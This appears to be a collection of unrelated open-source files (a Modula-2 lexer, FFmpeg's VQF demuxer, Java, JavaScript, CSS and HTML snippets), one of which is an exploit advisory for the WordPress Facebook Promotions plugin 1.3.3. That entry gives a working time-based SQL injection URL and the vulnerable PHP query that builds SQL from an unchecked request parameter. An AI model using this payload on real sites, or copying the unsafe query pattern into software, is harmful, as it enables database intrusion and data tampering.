"parsing" of a number is that we don't know the base in advance so we have to read the number with the help of a rather complex finite automaton. */ enum statetp {Oct,OptHex,Hex,Dec,OctEndOrHex,End,OptReal,Real}; register enum statetp state; register int base = 8; register char *np = &buf[0]; *np++ = ch; state = is_oct(ch) ? Oct : Dec; LoadChar(ch); for (;;) { switch(state) { case Oct: while (is_oct(ch)) { if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } if (ch == 'B' || ch == 'C') { state = OctEndOrHex; break; } /* Fall Through */ case Dec: base = 10; while (is_dig(ch)) { if (np < &buf[NUMSIZE]) { *np++ = ch; } LoadChar(ch); } if (ch == 'D') state = OptHex; else if (is_hex(ch)) state = Hex; else if (ch == '.') state = OptReal; else { state = End; if (ch == 'H') base = 16; else PushBack(); } break; case OptHex: LoadChar(ch); if (is_hex(ch)) { if (np < &buf[NUMSIZE]) *np++ = 'D'; state = Hex; } else { state = End; ch = 'D'; PushBack(); } break; case Hex: while (is_hex(ch)) { if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } base = 16; state = End; if (ch != 'H') { lexerror("H expected after hex number"); PushBack(); } break; case OctEndOrHex: if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); if (ch == 'H') { base = 16; state = End; break; } if (is_hex(ch)) { state = Hex; break; } PushBack(); ch = *--np; *np++ = '\0'; /* Fall through */ case End: { int ovfl = 0; *np = '\0'; if (np >= &buf[NUMSIZE]) { tk->TOK_INT = 1; lexerror("constant too long"); } else { /* The upperbound will be the same as when computed with something like max(unsigned long) / base (when base is even). The problem is that unsigned long or unsigned arith is not accepted by all compilers */ arith ubound = max_int[sizeof(arith)] / (base >> 1); np = &buf[0]; while (*np == '0') np++; tk->TOK_INT = 0; while (*np) { int c; if (is_dig(*np)) { c = *np++ - '0'; } else { assert(is_hex(*np)); c = *np++ - 'A' + 10; } if (tk->TOK_INT < 0 || tk->TOK_INT > ubound) { ovfl++; } tk->TOK_INT = tk->TOK_INT*base; if (tk->TOK_INT < 0 && tk->TOK_INT + c >= 0) { ovfl++; } tk->TOK_INT += c; } } toktype = card_type; if (ch == 'C' && base == 8) { toktype = char_type; if (ovfl != 0 || tk->TOK_INT>255 || tk->TOK_INT < 0) { lexwarning(W_ORDINARY, "character constant out of range"); } CheckForLet(); return tk->tk_symb = INTEGER; } if (options['l']) { if (base != 10) { LoadChar(ch); if (ch != 'D') { PushBack(); } } } if (ch == 'D' && (options['l'] || base == 10)) { if (options['l']) { /* Local extension: LONGCARD exists, so internally also longintorcard_type exists. */ toktype = longcard_type; if (ovfl == 0 && tk->TOK_INT >= 0 && tk->TOK_INT<=max_int[(int)long_size]) { toktype = longintorcard_type; } else if (! chk_bounds(tk->TOK_INT, full_mask[(int)long_size], T_CARDINAL)) { ovfl = 1; } } else { if (ovfl != 0 || tk->TOK_INT > max_int[(int)long_size] || tk->TOK_INT < 0) { ovfl = 1; } toktype = longint_type; } } else if (ovfl == 0 && tk->TOK_INT >= 0 && tk->TOK_INT<=max_int[(int)int_size]) { toktype = intorcard_type; } else if (! chk_bounds(tk->TOK_INT, full_mask[(int)int_size], T_CARDINAL)) { ovfl = 1; } if (ovfl) lexwarning(W_ORDINARY, "overflow in constant"); CheckForLet(); return tk->tk_symb = INTEGER; } case OptReal: /* The '.' could be the first of the '..' token. At this point, we need a look-ahead of two characters. */ LoadChar(ch); if (ch == '.') { /* Indeed the '..' token */ PushBack(); PushBack(); state = End; base = 10; break; } state = Real; break; } if (state == Real) break; } /* a real real constant */ if (np < &buf[NUMSIZE]) *np++ = '.'; toktype = real_type; while (is_dig(ch)) { /* Fractional part */ if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } if (ch == 'D') { toktype = longreal_type; LoadChar(ch); if (ch == '+' || ch == '-' || is_dig(ch)) { ch = 'E'; PushBack(); } } if (ch == 'E') { /* Scale factor */ if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); if (ch == '+' || ch == '-') { /* Signed scalefactor */ if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } if (is_dig(ch)) { do { if (np < &buf[NUMSIZE]) *np++ = ch; LoadChar(ch); } while (is_dig(ch)); } else { lexerror("bad scale factor"); } } *np++ = '\0'; PushBack(); tk->tk_data.tk_real = new_real(); if (np >= &buf[NUMSIZE]) { tk->TOK_RSTR = Salloc("0.0", 4); lexerror("real constant too long"); } else tk->TOK_RSTR = Salloc(buf, (unsigned) (np - buf)); CheckForLet(); flt_str2flt(tk->TOK_RSTR, &(tk->TOK_RVAL)); if (flt_status == FLT_OVFL) { lexwarning(W_ORDINARY, "overflow in floating point constant"); } return tk->tk_symb = REAL; /*NOTREACHED*/ } case STEOI: return tk->tk_symb = -1; case STCHAR: default: crash("(LLlex) Impossible character class"); /*NOTREACHED*/ } /*NOTREACHED*/ }
{ "pile_set_name": "Github" }
package org.intermine.webservice.server.search; /* * Copyright (C) 2002-2020 FlyMine * * This code may be freely distributed and modified under the * terms of the GNU Lesser General Public Licence. This should * be distributed with the code. See the LICENSE file for more * information or http://www.gnu.org/copyleft/lesser.html. * */ import javax.servlet.ServletContext; import org.intermine.webservice.server.WebService; import org.intermine.webservice.server.core.NoServiceException; import org.intermine.webservice.server.core.WebServiceServlet; /** @author Alex Kalderimis **/ public class QuickSearchServlet extends WebServiceServlet { private static final long serialVersionUID = -5506185356973283525L; @Override protected WebService getService(Method method) throws NoServiceException { ServletContext ctx = this.getServletContext(); switch (method) { case GET: return new QuickSearch(api, ctx); case POST: return new QuickSearch(api, ctx); default: throw new NoServiceException(); } } }
{ "pile_set_name": "Github" }
/* * VQF demuxer * Copyright (c) 2009 Vitor Sessak * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #include "avformat.h" #include "libavutil/intreadwrite.h" typedef struct VqfContext { int frame_bit_len; uint8_t last_frame_bits; int remaining_bits; } VqfContext; static int vqf_probe(AVProbeData *probe_packet) { if (AV_RL32(probe_packet->buf) != MKTAG('T','W','I','N')) return 0; if (!memcmp(probe_packet->buf + 4, "97012000", 8)) return AVPROBE_SCORE_MAX; if (!memcmp(probe_packet->buf + 4, "00052200", 8)) return AVPROBE_SCORE_MAX; return AVPROBE_SCORE_MAX/2; } static void add_metadata(AVFormatContext *s, const char *tag, unsigned int tag_len, unsigned int remaining) { int len = FFMIN(tag_len, remaining); char *buf; if (len == UINT_MAX) return; buf = av_malloc(len+1); if (!buf) return; get_buffer(s->pb, buf, len); buf[len] = 0; av_metadata_set2(&s->metadata, tag, buf, AV_METADATA_DONT_STRDUP_VAL); } static int vqf_read_header(AVFormatContext *s, AVFormatParameters *ap) { VqfContext *c = s->priv_data; AVStream *st = av_new_stream(s, 0); int chunk_tag; int rate_flag = -1; int header_size; int read_bitrate = 0; int size; if (!st) return AVERROR(ENOMEM); url_fskip(s->pb, 12); header_size = get_be32(s->pb); st->codec->codec_type = AVMEDIA_TYPE_AUDIO; st->codec->codec_id = CODEC_ID_TWINVQ; st->start_time = 0; do { int len; chunk_tag = get_le32(s->pb); if (chunk_tag == MKTAG('D','A','T','A')) break; len = get_be32(s->pb); if ((unsigned) len > INT_MAX/2) { av_log(s, AV_LOG_ERROR, "Malformed header\n"); return -1; } header_size -= 8; switch(chunk_tag){ case MKTAG('C','O','M','M'): st->codec->channels = get_be32(s->pb) + 1; read_bitrate = get_be32(s->pb); rate_flag = get_be32(s->pb); url_fskip(s->pb, len-12); st->codec->bit_rate = read_bitrate*1000; st->codec->bits_per_coded_sample = 16; break; case MKTAG('N','A','M','E'): add_metadata(s, "title" , len, header_size); break; case MKTAG('(','c',')',' '): add_metadata(s, "copyright", len, header_size); break; case MKTAG('A','U','T','H'): add_metadata(s, "author" , len, header_size); break; case MKTAG('A','L','B','M'): add_metadata(s, "album" , len, header_size); break; case MKTAG('T','R','C','K'): add_metadata(s, "track" , len, header_size); break; case MKTAG('C','O','M','T'): add_metadata(s, "comment" , len, header_size); break; case MKTAG('F','I','L','E'): add_metadata(s, "filename" , len, header_size); break; case MKTAG('D','S','I','Z'): add_metadata(s, "size" , len, header_size); break; case MKTAG('D','A','T','E'): add_metadata(s, "date" , len, header_size); break; case MKTAG('G','E','N','R'): add_metadata(s, "genre" , len, header_size); break; default: av_log(s, AV_LOG_ERROR, "Unknown chunk: %c%c%c%c\n", ((char*)&chunk_tag)[0], ((char*)&chunk_tag)[1], ((char*)&chunk_tag)[2], ((char*)&chunk_tag)[3]); url_fskip(s->pb, FFMIN(len, header_size)); break; } header_size -= len; } while (header_size >= 0); switch (rate_flag) { case -1: av_log(s, AV_LOG_ERROR, "COMM tag not found!\n"); return -1; case 44: st->codec->sample_rate = 44100; break; case 22: st->codec->sample_rate = 22050; break; case 11: st->codec->sample_rate = 11025; break; default: st->codec->sample_rate = rate_flag*1000; break; } switch (((st->codec->sample_rate/1000) << 8) + read_bitrate/st->codec->channels) { case (11<<8) + 8 : case (8 <<8) + 8 : case (11<<8) + 10: case (22<<8) + 32: size = 512; break; case (16<<8) + 16: case (22<<8) + 20: case (22<<8) + 24: size = 1024; break; case (44<<8) + 40: case (44<<8) + 48: size = 2048; break; default: av_log(s, AV_LOG_ERROR, "Mode not suported: %d Hz, %d kb/s.\n", st->codec->sample_rate, st->codec->bit_rate); return -1; } c->frame_bit_len = st->codec->bit_rate*size/st->codec->sample_rate; av_set_pts_info(st, 64, 1, st->codec->sample_rate); return 0; } static int vqf_read_packet(AVFormatContext *s, AVPacket *pkt) { VqfContext *c = s->priv_data; int ret; int size = (c->frame_bit_len - c->remaining_bits + 7)>>3; pkt->pos = url_ftell(s->pb); pkt->stream_index = 0; if (av_new_packet(pkt, size+2) < 0) return AVERROR(EIO); pkt->data[0] = 8 - c->remaining_bits; // Number of bits to skip pkt->data[1] = c->last_frame_bits; ret = get_buffer(s->pb, pkt->data+2, size); if (ret<=0) { av_free_packet(pkt); return AVERROR(EIO); } c->last_frame_bits = pkt->data[size+1]; c->remaining_bits = (size << 3) - c->frame_bit_len + c->remaining_bits; return size+2; } static int vqf_read_seek(AVFormatContext *s, int stream_index, int64_t timestamp, int flags) { VqfContext *c = s->priv_data; AVStream *st; int ret; int64_t pos; st = s->streams[stream_index]; pos = av_rescale_rnd(timestamp * st->codec->bit_rate, st->time_base.num, st->time_base.den * (int64_t)c->frame_bit_len, (flags & AVSEEK_FLAG_BACKWARD) ? AV_ROUND_DOWN : AV_ROUND_UP); pos *= c->frame_bit_len; st->cur_dts = av_rescale(pos, st->time_base.den, st->codec->bit_rate * (int64_t)st->time_base.num); if ((ret = url_fseek(s->pb, ((pos-7) >> 3) + s->data_offset, SEEK_SET)) < 0) return ret; c->remaining_bits = -7 - ((pos-7)&7); return 0; } AVInputFormat vqf_demuxer = { "vqf", NULL_IF_CONFIG_SMALL("Nippon Telegraph and Telephone Corporation (NTT) TwinVQ"), sizeof(VqfContext), vqf_probe, vqf_read_header, vqf_read_packet, NULL, vqf_read_seek, .extensions = "vqf", };
{ "pile_set_name": "Github" }
/*! @file Defines `boost::hana::detail::variadic::reverse_apply`. @copyright Louis Dionne 2013-2016 Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE.md or copy at http://boost.org/LICENSE_1_0.txt) */ #ifndef BOOST_HANA_DETAIL_VARIADIC_REVERSE_APPLY_HPP #define BOOST_HANA_DETAIL_VARIADIC_REVERSE_APPLY_HPP #include <boost/hana/config.hpp> #include <boost/hana/detail/variadic/reverse_apply/unrolled.hpp> BOOST_HANA_NAMESPACE_BEGIN namespace detail { namespace variadic { BOOST_HANA_CONSTEXPR_LAMBDA auto reverse_apply = [](auto&& f, auto&& ...x) -> decltype(auto) { return detail::variadic::reverse_apply_unrolled( static_cast<decltype(f)&&>(f), static_cast<decltype(x)&&>(x)... ); }; }} BOOST_HANA_NAMESPACE_END #endif // !BOOST_HANA_DETAIL_VARIADIC_REVERSE_APPLY_HPP
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <script src="/benchmark/js/jquery.min.js"></script> <script type="text/javascript" src="/benchmark/js/js.cookie.js"></script> <title>BenchmarkTest02678</title> </head> <body> <form action="/benchmark/hash-02/BenchmarkTest02678" method="POST" id="FormBenchmarkTest02678"> <div><label>Please enter your details:</label></div> <br/> <div><label>Email:</label></div> <div><input type="text" id="email" name="email"></input></div> <div><label>Password:</label></div> <div><input type="text" id="password" name="password" value=""></input></div> <div>&nbsp</div> <div><label>Parameter: BenchmarkTest02678 <BR> Value:</label> <input type="text" id="BenchmarkTest02678" name="BenchmarkTest02678" value="someSecret"></input></div> <br/> <div><input type="submit" value="Login" /></div> </form> </body> </html>
{ "pile_set_name": "Github" }
/** * Copyright (c) 2014-2017 Netflix, Inc. All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * <p>Preshared keys profile entity authentication factory.</p> * * @author Wesley Miaw <[email protected]> */ (function(require, module) { "use strict"; var EntityAuthenticationFactory = require('../entityauth/EntityAuthenticationFactory.js'); var EntityAuthenticationScheme = require('../entityauth/EntityAuthenticationScheme.js'); var AsyncExecutor = require("../util/AsyncExecutor.js"); var PresharedProfileAuthenticationData = require('../entityauth/PresharedProfileAuthenticationData.js'); var MslInternalException = require('../MslInternalException.js'); var MslError = require('../MslError.js'); var MslEntityAuthException = require('../MslEntityAuthException.js'); var SymmetricCryptoContext = require('../crypto/SymmetricCryptoContext.js'); var PresharedProfileAuthenticationFactory = module.exports = EntityAuthenticationFactory.extend({ /** * Construct a new preshared keys profile authentication factory instance. * * @param {KeySetStore} store key set store.} store preshared key store. * @param {AuthenticationUtils} authutils authentication utilities. */ init: function init(store, authutils) { init.base.call(this, EntityAuthenticationScheme.PSK_PROFILE); // The properties. var props = { store: { value: store, writable: false, enumerable: false, configurable: false }, authutils: { value: authutils, writable: false, enumerable: false, configurable: false }, }; Object.defineProperties(this, props); }, /** @inheritDoc */ createData: function createData(ctx, entityAuthMo, callback) { AsyncExecutor(callback, function() { return PresharedProfileAuthenticationData.parse(entityAuthMo); }); }, /** @inheritDoc */ getCryptoContext: function getCryptoContext(ctx, authdata) { // Make sure we have the right kind of entity authentication data. if (!(authdata instanceof PresharedProfileAuthenticationData)) throw new MslInternalException("Incorrect authentication data type " + authdata + "."); var ppad = authdata; // Check for revocation. var pskId = ppad.presharedKeysId; if (this.authutils.isEntityRevoked(pskId)) throw new MslEntityAuthException(MslError.ENTITY_REVOKED, "psk profile " + pskId).setEntityAuthenticationData(ppad); // Verify the scheme is permitted. if (!this.authutils.isSchemePermitted(pskId, this.scheme)) throw new MslEntityAuthException(MslError.INCORRECT_ENTITYAUTH_DATA, "Authentication scheme for entity " + pskId + " not supported:" + this.scheme).setEntityAuthenticationData(ppad); // Load key set. var keys = this.store.getKeys(pskId); if (!keys) throw new MslEntityAuthException(MslError.ENTITY_NOT_FOUND, "psk profile " + pskId).setEntityAuthenticationData(ppad); // Return the crypto context. var identity = ppad.getIdentity(); return new SymmetricCryptoContext(ctx, identity, keys.encryptionKey, keys.hmacKey, keys.wrappingKey); }, }); })(require, (typeof module !== 'undefined') ? module : mkmodule('PresharedProfileAuthenticationFactory'));
{ "pile_set_name": "Github" }
# Exploit Title: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability # Date: 2011-08-28 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/fbpromotions.1.3.3.zip # Version: 1.3.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/fbpromotions/fbActivate.php?action=activate&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20 --------------- Vulnerable code --------------- if($_REQUEST['action']=="activate"){ $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']); ... $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'";
{ "pile_set_name": "Github" }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0-google-v3) on Mon May 09 20:04:52 EDT 2011 --> <TITLE> org.mozilla.javascript.optimizer (Rhino) </TITLE> <META NAME="date" CONTENT="2011-05-09"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../org/mozilla/javascript/optimizer/package-summary.html" target="classFrame">org.mozilla.javascript.optimizer</A></FONT> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="ClassCompiler.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">ClassCompiler</A> <BR> <A HREF="Codegen.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">Codegen</A> <BR> <A HREF="OptRuntime.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">OptRuntime</A> <BR> <A HREF="OptRuntime.GeneratorState.html" title="class in org.mozilla.javascript.optimizer" target="classFrame">OptRuntime.GeneratorState</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
{ "pile_set_name": "Github" }
.rightFavorite:host { display: block; --box-border-radius: 1px; --link-primary-color: #778087; --link-visited-color: #afb9c1; --link-primary-hover-color: #4d5256; } div.rightFavorite.node { background-color: transparent; border-radius: var(--box-border-radius); box-shadow: none; font-size: 14px; margin: 0px -10px 0px -10px; padding: 5px 10px 5px 10px; } div.rightFavorite.node .rightFavorite.node_compose { float: right; visibility: hidden; margin: 3px 0px 0px 0px; } div.rightFavorite.node:hover { background-color: #f5f5f5; box-shadow: 0px 1px 4px rgba(0, 0, 0, 0.1) inset; } div.rightFavorite.node:hover .rightFavorite.node_compose { float: right; visibility: visible; } div.rightFavorite#avatar { width: 24px; height: 24px; background-size: 24px 24px; background-repeat: no-repeat; display: inline-block; vertical-align: middle; }
{ "pile_set_name": "Github" }
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Example - example-example17-jquery</title> <script src="../../components/jquery-2.1.1/jquery.js"></script> <script src="../../../angular.js"></script> <script src="script.js"></script> </head> <body ng-app="docsTransclusionExample"> <div ng-controller="Controller"> <my-dialog>Check out the contents, {{name}}!</my-dialog> </div> </body> </html>
{ "pile_set_name": "Github" }